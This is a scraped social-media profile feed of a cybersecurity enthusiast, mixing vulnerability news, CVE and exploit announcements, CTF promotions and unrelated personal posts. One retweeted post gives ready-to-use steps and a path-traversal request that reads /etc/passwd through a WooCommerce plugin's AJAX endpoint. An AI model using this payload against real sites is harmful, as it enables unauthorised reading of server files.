Mamadou Abdoulaye

245 posts

Mamadou Abdoulaye

Mamadou Abdoulaye

@bloman19

Google Student | Cybersecurity Enthusiast | Linux User 😄 | Baby H4ck3r

HackThePlanet Katılım Nisan 2021
1.4K Takip Edilen247 Takipçiler
Mamadou Abdoulaye retweetledi
Chocapikk
Chocapikk@Chocapikk_·
CVE-2026-26215 - Unauthenticated RCE in manga-image-translator (9.3k stars) Two FastAPI endpoints call pickle.loads() on raw HTTP bodies. Auth exists but defaults to an empty string, which is falsy in Python, so the check never runs. First reported by sud0why in May 2025, auto-closed by a stale bot. Still unpatched. chocapikk.com/posts/2026/man…
English
1
6
50
4.1K
Secfortress
Secfortress@Secfortress·
People should just do what they like bruhh, If you ask me, Am i a Christian, I would tell you yes but i clearly read the bible and the quran and it gives me peace bruhh…..
Secfortress tweet media
English
2
0
1
191
Secfortress
Secfortress@Secfortress·
The amount of Alhamdulilah i say in a day whole heartedly is more than any word that has come out of my mouth bruhh…… I no really famz church oo, but anything Godliness, that put me in a position of peace, I would be there bruhh… The whole religion P on my TL…
English
1
2
28
1.1K
Mamadou Abdoulaye retweetledi
Chocapikk
Chocapikk@Chocapikk_·
Hello guys, I've already talked about WPProbe, my tool to fingerprint WordPress through its REST API. This time, I'm sharing some behind-the-scenes: the idea behind it, and a few struggles I had along the way. Not that complex, but worth the effort. 📝 chocapikk.com/posts/2025/wpp…
English
1
13
65
4.4K
Chocapikk
Chocapikk@Chocapikk_·
Finally found an unauthenticated RCE for 2025. (No joke, took only 5 minutes to find.) Exploit confirmed & session obtained.
Chocapikk tweet media
English
24
45
696
51.8K
Muhammad Waseem
Muhammad Waseem@wgujjer11·
WooCommerce plugin allows LFI! 🍃 02: Capture request in Burp 03: Change request method to POST and add: POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 04: Also add: action=woof_text_search& 05: That’s it! You got local files.
Muhammad Waseem tweet media
English
11
99
610
36.3K
Chocapikk
Chocapikk@Chocapikk_·
900+ WordPress plugins just casually leak their presence. No bruteforce, no guessing, just a simple request. Wild. Haven't seen anyone using this for recon yet. 🤔 Soon. cc: @leak_ix
Chocapikk tweet media
English
35
236
1.5K
153.4K
Sarper⚡
Sarper⚡@sarperavci·
You can send your website to me if it's not listed there
English
6
0
5
1.5K
Sarper⚡
Sarper⚡@sarperavci·
Just launched CTF Search with 24k+ CTF writeups, covering everything from web exploitation to reverse engineering. Check it out! ctfsearch.hackmap.win
Sarper⚡ tweet media
English
21
309
1.2K
66.7K
Shad0w
Shad0w@Itx_Shad0w·
🙈
Shad0w tweet media
QME
9
9
156
11.7K
Mamadou Abdoulaye retweetledi
Chocapikk
Chocapikk@Chocapikk_·
🚨 [CVE-2024-56145] Exploit released! 🚨 I’ve successfully reproduced the Craft CMS RCE vulnerability, thanks to the outstanding research by @Assetnote. Details, PoC, and setup instructions: 🔗 github.com/Chocapikk/CVE-… Learn more: 📖 assetnote.io/resources/rese… 🙏 Huge thanks to Assetnote for this amazing work! 🙌
Chocapikk tweet media
English
4
61
276
22.6K
Starlink
Starlink@Starlink·
Starlink Mini est désormais disponible en Belgique ! Commandez-le en ligne en moins de 2 minutes
Français
98
145
976
4M
Adam Dodds
Adam Dodds@doddsie·
🇬🇳 Guinea @Starlink ✖️ No service Geoblocked at the border was a huge bummer, especially later in the night with no cell service. Woke up in my tent the following morning to chants of “Prooooo Government”. Many stories about Guinea, not on my recommendation list for prospective travellers.
Adam Dodds tweet mediaAdam Dodds tweet mediaAdam Dodds tweet mediaAdam Dodds tweet media
English
1
0
6
1K
Laluka@OffenSkill
Laluka@OffenSkill@TheLaluka·
FFS it's written "sandbox", of course it's a real shell, bug, and RCE! 🤯 Go report it as fast as you can you young fellow hacker! 💌 (Nope, it's not, sorry... But do refrain from mass-tagging for such findings, a gentle DM or ping to one person is often way more than enough... 🙏)
English
1
0
1
65
Blaklis
Blaklis@Blaklis_·
Today challenge is to read the /flag.txt file - top 3 will get $50 each :) http://52.0.228.201/?source=1 Don't comment with the solution; DM me if you get the flag with the solution! Solve it locally then remotely please! :) #blaklisctf #bugbounty
English
14
20
204
35.1K
Mamadou Abdoulaye
Mamadou Abdoulaye@bloman19·
@Blaklis_ Okay. Est-ce qu'il reste toujours une place pour celui qui solve le chall ?
Français
1
0
0
247
Blaklis
Blaklis@Blaklis_·
@bloman19 Nop, it will go to an official charity :)
English
1
0
2
880